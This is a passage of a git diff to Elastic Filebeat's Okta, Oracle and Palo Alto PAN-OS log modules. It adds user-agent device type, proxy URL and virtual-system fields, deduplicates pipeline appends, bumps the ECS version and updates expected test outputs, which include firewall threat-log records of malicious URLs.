"user_agent.original": "SkypeSpaces/1.0a$*+" }, @@ -1553,6 +1572,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "SkypeSpaces/1.0a$*+" }, @@ -1605,6 +1625,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -1657,6 +1678,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -1709,6 +1731,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -1761,6 +1784,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -1813,6 +1837,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -1879,6 +1904,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -1931,6 +1957,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -1983,6 +2010,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -2060,6 +2088,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "SkypeSpaces/1.0a$*+" }, @@ -2130,6 +2159,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "SkypeSpaces/1.0a$*+" }, @@ -2207,6 +2237,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -2284,6 +2315,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -2361,6 +2393,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -2438,6 +2471,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -2515,6 +2549,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -2592,6 +2627,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -2682,6 +2718,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", "user_agent.os.full": "Mac OS X 10.15", @@ -2776,6 +2813,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", "user_agent.os.full": "Mac OS X 10.15", @@ -2870,6 +2908,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", "user_agent.os.full": "Mac OS X 10.15", @@ -2964,6 +3003,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", "user_agent.os.full": "Mac OS X 10.15", @@ -3256,6 +3296,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", "user_agent.os.full": "Mac OS X 10.15", @@ -3352,6 +3393,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", "user_agent.os.full": "Mac OS X 10.15", @@ -3446,6 +3488,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0", "user_agent.os.full": "Mac OS X 10.15", diff --git a/x-pack/filebeat/module/okta/fields.go b/x-pack/filebeat/module/okta/fields.go index 24c40aebc4f..749c3ee54db 100644 --- a/x-pack/filebeat/module/okta/fields.go +++ b/x-pack/filebeat/module/okta/fields.go @@ -19,5 +19,5 @@ func init() { // AssetOkta returns asset data. // This is the base64 encoded gzipped contents of module/okta. func AssetOkta() string { - return "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" + return "eJzsWk1zozwSvudXdOXMm8N+zMGHrSKGZJjYxgU4rpwoBdq2Nhh5JJGM59dviQ8bAwZik633MNyMpOd5utVqtYT/gjfcj4C9SXIDIKmMcAR29itEEXC6k5TFI/jPDQDAlIVJhLBiHDYkDiMar0HshcQtRGwtYMXZNh1+dwOwohiFYpQO/AtissUDkXrkfocjWHOW7PI3Ia5IEkk/HTiCFYkEHppqWtTzkFKc0qqnTF2mTxIaHl4e7F0sLKP0VmwYlyPwNghJTH8mCDTEWNIVRQ5sBXKDKRlM2Np8x1jelQafEaqeywAzN73h/oPxo/aaZajG+apz3b4UE7zTtpKValSh4wKbuob3tOAduaAsrst/rjWUtOejrpDfA6GnBQLfkVO5r5vg1ltKNhTjrjDiLARMEyHhFYHF6SQZ5v3iUQNr9mBrsNSdmQaMg+k4tnOBxSEVu4js/S0KQdYNoWdkHWBa61CyP0eBHOUKN3wCqaeFJJCM1+3SK69za/J8lNOmY9NkeYE5OZTcEAkRStizBIRkHIHGK8a3RJaCtpupnm2hIU+WmgoHnCTMc27rsAXAqiW8VPJdG3MlmV3M7ZXyUzcriSTymEj0h7FcL/Aakn63mmKBqV9DqCnWo8LrUlFoCCKKsayvgXH1/ekiIK8skSlBBnCGboBF0Jvp8kWwa3B+5WV7DG4QrDmQMOQoDgkik9saAIlA7pP1qaM7yGoToEAgBWlKHlUV5z3V6qujZk4+/DO62wK3w6rMiZx8HGw4mnA0sNGZpfpTDCvHdktqOrhfOfsQyIcVkIM2+KRHcP1m8TAZdoMpVp/oakpy+E6DwYSc1ZDztEoZJuenMmrZ/qwnDsGZyIBtG6ooO2toK2dOc2/vhJlTflE6bkC/OAVzJOLkEHDV7GRohUNrOhv5RRLJ4fgVWpW/UqyPwF2Mx6bravCgW5OFY2rgPlnzuWlooE8m9lIDw5y9aDD+rk8m5uzR1GAxe5rZy1lLmEnC19iwn3vV96USPaIiU5v2EZ8oyVtGZv5bRURKjDH8U5f+qUs/U5dKTmJBAtl4aeA1Nl6QJTlGRGJYZvuCbNnB8rc7vTXq/Mq1Ur5nKnFXrzdul+b9rQa3P+z725bQCfE1WfsBiyX+asiEhmqGca35wk02ZYOc7Yu22rMcF4dO5qOQHC5se05TpkSNG/BIkZVu/orGa+Q7Toc+VpSAixBvqRbLVcHPBIWs5uSr9dRzcs7UU0/C6cDnrgwYFo7VIUFuOBLpi0TsMJA4qGMUMhyQO4QkPBrWBwtn0pJTSCI3atKCdGmeTy76Sb9hsswp9xemmm6ii/NNxX87zt5pWDkuD3QsPKbNij0FaW1fsZ883dcX3ndz5llj3bPsmT937GfLMB0N9LFnPZu+YTnm2LOdFw0mhj7X4ME0TCftrIFrjy19oip51eUwuL3mO3WJkNh4DxVLXFcc1emOiuEKulVKwDFNSST6P8zMkaxjRsaOaagZ0Sel2XBcXQP3ZarPPHOswaNtP05MDYyFrcHL4t56Ml/6mjpk+dJqpsKtm+jNNXCnrgZz3XWXtqOOfa5rOllEWUtdA3OqWxMNbBWb/9Dgx9LTYKx6PKgwNTWYO6bvftcd0/Ddl+nU9Bxr7D+ZL1ruwYllzjzfNV03BTXMZ2ts+gvDMtovSoRIPhtzzUswQ2qqFQjnZP/5WuHr9+Kq5OZ9sBo7Vwspf2htkXD4JPwrPeFFvkAhVP4Y7nIrRyxcc/RMwXnssQIS79tDKZbIV2TIG8AcEBKB4R3g3fpOAzuREWNvGtirFQ3wn9/+rcGH8Hgi5PlNXWCQcCr357dzN+8xzEZe8H3hFt5GcfnmLXrV+n22JRazLUtE/r+Su8+v/zjZvp65Zm/aKnstPd3NYbu+L/A1ielvUrl3aPNJL/4ybjbN7CMW6ZJrkNbDWSV3Va9woCNTdQpukKxIOvaTptLmouVvqeUfowQXuTrCwbyoIVqPu2xL6GD3yxlaH7NVOfVr38D7yliEJO7Pu9yg3CAHKoEKIJACA+MQs7avDvnJrp7ZnFrDhfcftaProDcfOboGNE5/qz5qOyoununODzaEDnSfloP1n5VJRQaw1/9icHoRfuXlCK0mlMbv053L9vh9uiPJ1f+pBdcVN9a8wKzVwM//0uD5W4cgwRIeDFhsuSleOd46BKyRrTnZbWhAooZSoQflYwmhmbhsVdMu0jPdB6d/Q+v2VUW6ym4K44xHSpMiibxqY0kLTQXSSbVjQqaOD68mzKBAQXXSBiyJJb/emxlMJ90aWcSCptKix478eBzcFl6HAEPm7xiN5c3/AgAA//++EKJK" } diff --git a/x-pack/filebeat/module/okta/system/_meta/fields.yml b/x-pack/filebeat/module/okta/system/_meta/fields.yml index 5bf5ee9c8d5..794d1cfa770 100644 --- a/x-pack/filebeat/module/okta/system/_meta/fields.yml +++ b/x-pack/filebeat/module/okta/system/_meta/fields.yml @@ -62,7 +62,7 @@ Display name of the actor. - name: client - title: Client + title: Client short: Fields about the client of the actor. description: > Fields that let you store information about the client of the actor. @@ -73,18 +73,18 @@ type: ip description: > The IP address of the client. - + - name: user_agent description: > Fields about the user agent information of the client. type: group fields: - + - name: raw_user_agent type: keyword description: > The raw informaton of the user agent. - + - name: os type: keyword description: > @@ -133,7 +133,7 @@ short: The list of targets. description: > The list of targets. - type: array + type: flattened fields: - name: id @@ -275,7 +275,7 @@ type: group fields: - - name: as + - name: as type: group description: > The autonomous system. @@ -291,7 +291,7 @@ description: > The organization that owns the AS number. fields: - + - name: name type: keyword description: > diff --git a/x-pack/filebeat/module/okta/system/config/input.yml b/x-pack/filebeat/module/okta/system/config/input.yml index 05ff819fad0..32f3091a4b8 100644 --- a/x-pack/filebeat/module/okta/system/config/input.yml +++ b/x-pack/filebeat/module/okta/system/config/input.yml @@ -12,6 +12,11 @@ request.ssl: {{ .ssl | tojson }} request.timeout: {{ .http_client_timeout }} {{ end }} + +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} + request.method: GET request.url: {{ .url }} request.rate_limit: @@ -63,4 +68,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/okta/system/manifest.yml b/x-pack/filebeat/module/okta/system/manifest.yml index 688f1a9ba44..830c8682de5 100644 --- a/x-pack/filebeat/module/okta/system/manifest.yml +++ b/x-pack/filebeat/module/okta/system/manifest.yml @@ -13,6 +13,7 @@ var: - name: tags default: [forwarded] - name: url + - name: proxy_url - name: initial_interval default: 24h diff --git a/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json b/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json index 226b52efa7d..794b2385a37 100644 --- a/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json +++ b/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json @@ -74,6 +74,7 @@ ], "user.full_name": "xxxxxx", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.15", @@ -157,6 +158,7 @@ ], "user.full_name": "xxxxxx", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.15", @@ -253,6 +255,7 @@ ], "user.full_name": "xxxxxx", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.15", diff --git a/x-pack/filebeat/module/oracle/database_audit/config/config.yml b/x-pack/filebeat/module/oracle/database_audit/config/config.yml index 09552183e0d..99aca1327ff 100644 --- a/x-pack/filebeat/module/oracle/database_audit/config/config.yml +++ b/x-pack/filebeat/module/oracle/database_audit/config/config.yml @@ -18,4 +18,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/panw/fields.go b/x-pack/filebeat/module/panw/fields.go index 927d5d4f226..1990a4b7403 100644 --- a/x-pack/filebeat/module/panw/fields.go +++ b/x-pack/filebeat/module/panw/fields.go @@ -19,5 +19,5 @@ func init() { // AssetPanw returns asset data. // This is the base64 encoded gzipped contents of module/panw. func AssetPanw() string { - return "eJzMmM9u4zYQxu95irm5BeLcesmhQNpFgABpamw26DGgqbHEmuJoh6O42qcvSEu21qJtxU6C6GbJ5PebPx9JaQpLbK6hUm51ASBGLG5+Zeg1m0oMuWv4/QIA4C/KaouwIIaZsgQ3VggeUFbESw+/zG4epn8//noBsDBoM38dB03BqXI7bbikqfAacqa6au8kxMJ1G+eBBVMJUmCcA8pIcdX+qS8FO3rkt7dTqoekf9InjvKJoNcxg6XcX/XHDrB6ZFxb9Cg/S7V4S2xWxNnOs0OMAPCgSgRaRMYwOUihBEolusAMpDAePHpvyF0lgTzVrDHJM0jXcZo2aUKA/wm6LGIJVVOLL2hbMaD5v6jlamd0Km190h/kdjmP5W4Ecbge11hBoK33vqz1eYwT5IUaJO9toTYqryBzarfB4GBRRxLNyMv04eZbV0aVZYzeX4JZdLfCU+OhQl4Ql5gNGffXuZfZFGAXwJ6HI/iHEdzNUoCbVYQ4lccOxJLL3w4liG1hklbN0ItxKsz7QX7tKX46037psX0u5/bJPqN9+1Xte7h//zwjH7XyETOP9NCemNKuHuHro84+j2uExdFljMrvMfhJB4Rv4WAQ5wTV9R4Ichmw+oVNArn1YeeD1ptW7cS1ptKqejYp076BqWdKL1FAq0pqRrj7Eg2tQApGta+scKarxzhMU1nWzkiTDn1M+CNTEK4/O7WYAUuraaF8sTklh5b/bSp1tT2k72mshbEfdeoMUie2VAjutH75wzjFDWyy03XKmsajk8A7R1BO2eYHpusyb2Is/xib3RoO4/jFaEytb+kiJ3Nfs/2g1NdsT8y8VoI5cfM+br6N/Rrr8fT1Pmx/MvGR/enr/UY7vY2EsV1BLuOYF+TMaIGwsBa4rrByGRifnACNFMgwKZU12lDtJ5cwyVk1K8U4uQRimMzRmdxNjpnI0mpo+zM2i7twXHHKgqtLZKPBZOjELAxy7GJUuhgeYNIvlvi9Rqfx2dXlHDnJmNhojwDeUw7ohJs+WXzlNR6M04wlOsGslRejrE3U8cmZ7zVuQ7KUR6QjMbWLPeOBt+aT8h66jnjdOUFqzOayA/WWbZD42LHTCNHmr6ALP96Vb5O1FFkfSOm9L1BjWKYDmJs4IYhaotsQHPzmEtReKfJYoQ7ZXy9SYYLuo4+lPO2/ev58tpCv5wOx/wMAAP//TA8GjA==" + return "eJzMmM9u4zYQxu95irm5BeLcesmhQNpFgABpamw27TGgqZHEmiK1w2Fc7dMvSEu21qYsxc4G0c2Sye83fz6S0hxW2FxDLcz6AoAVa9z+ytBJUjUra67h9wsAgL9s5jVCbgkWQlu40WzhAXltaeXgl8XNw/zvx18vAHKFOnPXcdAcjKh204aLmxqvoSDr6/ZOQixct3EeyMlWwCXGOaCKFFftn/pSsKdn3e52SvWY9A/6lqJ8IuhNzKBt4a76Yw+wemTkNTrkH6VavBU2a0vZ3rNjjADwICoEm0fGMDlwKRgqwbLEDLhUDhw6p6y5SgI560likucgXeM0bdLYAv7PaLKIxbaea3xB3YqBXf6Hkq/2RqfS1if9Zs0+51juJhCH63GDFQTaeg9lrc+jDCPl4iB5bwu1VXkFmRH7DQZHizqRaGEdzx9uvnRlFFlG6NwlqLy7FZ4qBzVSbqnC7JBxuM69zKYAuwAGHk7gP4zgbpEC3K4illJ57EC0NcXboQSxHUzSqhk6VkaEed/Jrz3FD2faTz22j+XcPtlHtG+/qn0P9++fZ+RRK4+YeaKHBmJKu3qCr0edfR7XBIujyQiFGzD4SQeEL+FgEOcE0fUeMFIVsPqFTQKZzWHnndabVu3EtaaWon5WKdO+gakXQq6QQYqaPSHcfYqGFsAloRgqK5zp6ikOk7aqvFHcpEOfEv7EFITrz04tZkDb9bwUrtyekkPL/zZnX+8O6QONlSv9XqfOIHViS4XgTuuXP5QR1MA2O12nbGgcGg68SwRhhG6+YbouyybG8q/S2a2iMI5elMTU+pYucjL3nvQ7pd6TPjHzUjAWlpqf4+bb2K+xHk+f78P2xzMX2Z8+32+109tIGNsV5DKOeUHKlGQIC2uJmwoLk4FyyQlQcYkEs0poJZX1bnYJs4JEsxaEs0uwBLMlGlWY2ZiJtF0f2v6MzeIuHFeM0GB8haQkqAwNq1whxS5GIcvDA0z6xRK/ejQSn42vlkhJxsRGOwJ4bwtAw9T0yeIrr3KgjCSs0DBmrTwroXWijk9GffW4C0nbIiKNxNQu9oRH3ppPynvoOkubzglSUzaXPai3bIPEx469Rog2fwVd+PFT+bZZS5H1gYQcfIGawjI/gLmJEwKLFZotwdFvLkHtlSKPNcqQ/c0iFSboPvpoW6T955fPZws5vxwUS6q+KGIv9LNr9te+M8r9z2ZScI1jrEAZx8JIvPgeAAD//2MhKUk=" } diff --git a/x-pack/filebeat/module/panw/panos/_meta/fields.yml b/x-pack/filebeat/module/panw/panos/_meta/fields.yml index 490befc3e65..4fa1094f56f 100644 --- a/x-pack/filebeat/module/panw/panos/_meta/fields.yml +++ b/x-pack/filebeat/module/panw/panos/_meta/fields.yml @@ -142,3 +142,8 @@ - name: sub_type description: >- Specifies the sub type of the log + + - name: virtual_sys + type: keyword + description: > + Virtual system instance diff --git a/x-pack/filebeat/module/panw/panos/config/input.yml b/x-pack/filebeat/module/panw/panos/config/input.yml index 8fa5bd12958..fe5dab98db8 100644 --- a/x-pack/filebeat/module/panw/panos/config/input.yml +++ b/x-pack/filebeat/module/panw/panos/config/input.yml @@ -68,6 +68,7 @@ processors: server.user.name: 13 destination.user.name: 13 network.application: 14 + panw.panos.virtual_sys: 15 panw.panos.source.zone: 16 observer.ingress.zone: 16 panw.panos.destination.zone: 17 @@ -130,6 +131,7 @@ processors: server.user.name: 13 destination.user.name: 13 network.application: 14 + panw.panos.virtual_sys: 15 panw.panos.source.zone: 16 observer.ingress.zone: 16 panw.panos.destination.zone: 17 @@ -209,4 +211,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/panw/panos/ingest/pipeline.yml b/x-pack/filebeat/module/panw/panos/ingest/pipeline.yml index 42d2f4ff9c1..e0bbd9b8c25 100644 --- a/x-pack/filebeat/module/panw/panos/ingest/pipeline.yml +++ b/x-pack/filebeat/module/panw/panos/ingest/pipeline.yml @@ -223,6 +223,7 @@ processors: if: 'ctx?.panw?.panos?.type == "TRAFFIC"' - append: field: event.category + allow_duplicates: false value: - network_traffic - network @@ -233,6 +234,7 @@ processors: if: 'ctx?.panw?.panos?.type == "THREAT"' - append: field: event.category + allow_duplicates: false value: - security_threat - intrusion_detection @@ -240,10 +242,12 @@ processors: if: 'ctx?.panw?.panos?.type == "THREAT"' - append: field: event.type + allow_duplicates: false value: allowed if: "ctx?.panw?.panos?.action != null && ['alert', 'allow', 'continue'].contains(ctx.panw.panos.action)" - append: field: event.type + allow_duplicates: false value: denied if: "ctx?.panw?.panos?.action != null && ['deny', 'drop', 'reset-client', 'reset-server', 'reset-both', 'block-url', 'block-ip', 'random-drop', 'sinkhole', 'block'].contains(ctx.panw.panos.action)" - set: @@ -258,6 +262,7 @@ processors: if: 'ctx?.panw?.panos?.sub_type == "start"' - append: field: event.type + allow_duplicates: false value: - start - connection @@ -268,6 +273,7 @@ processors: if: 'ctx?.panw?.panos?.sub_type == "end"' - append: field: event.type + allow_duplicates: false value: - end - connection @@ -278,6 +284,7 @@ processors: if: 'ctx?.panw?.panos?.sub_type == "drop"' - append: field: event.type + allow_duplicates: false value: - denied - connection @@ -288,6 +295,7 @@ processors: if: 'ctx?.panw?.panos?.sub_type == "deny"' - append: field: event.type + allow_duplicates: false value: - denied - connection @@ -467,8 +475,9 @@ processors: # Append NAT community_id to network.community_id - append: - if: 'ctx?.panw?.panos?.network?.nat?.community_id != null && ctx.panw.panos.network.nat.community_id != ctx?.network?.community_id' + if: 'ctx?.panw?.panos?.network?.nat?.community_id != null' field: network.community_id + allow_duplicates: false value: - '{{panw.panos.network.nat.community_id}}' diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json b/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json index a6777dca5e6..bf6ff1e9006 100644 --- a/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json @@ -800,6 +800,7 @@ "panw.panos.sub_type": "start", "panw.panos.type": "TRAFFIC", "panw.panos.url.category": "any", + "panw.panos.virtual_sys": "vsys1", "related.ip": [ "192.168.0.2", "204.232.231.46", diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json b/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json index 10ea226c1ee..5388af2b903 100644 --- a/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json @@ -69,6 +69,7 @@ "panw.panos.threat.resource": "lorexx.cn/loader.exe", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "lorexx.cn" ], @@ -168,6 +169,7 @@ "panw.panos.threat.resource": "lsiu.info/evo/count.php?o=2", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "lsiu.info" ], @@ -268,6 +270,7 @@ "panw.panos.threat.resource": "lsiu.info/evo/count.php?o=5", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "lsiu.info" ], @@ -368,6 +371,7 @@ "panw.panos.threat.resource": "lsiu.info/evo/count.php?o=7", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "lsiu.info" ], @@ -468,6 +472,7 @@ "panw.panos.threat.resource": "lsiu.info/evo/exploits/x18.php?o=2&t=1241403746&i=1365814122", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "lsiu.info" ], @@ -568,6 +573,7 @@ "panw.panos.threat.resource": "lsiu.info/evo/exploits/x19.php?o=2&t=1241403746&i=1365814122", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "lsiu.info" ], @@ -668,6 +674,7 @@ "panw.panos.threat.resource": "liteautobestguide.cn/load.php", "panw.panos.type": "THREAT", "panw.panos.url.category": "not-resolved", + "panw.panos.virtual_sys": "vsys1", "related.hosts": [ "liteautobestguide.cn" ], @@ -767,6 +774,7 @@ "panw.panos.threat.resource": 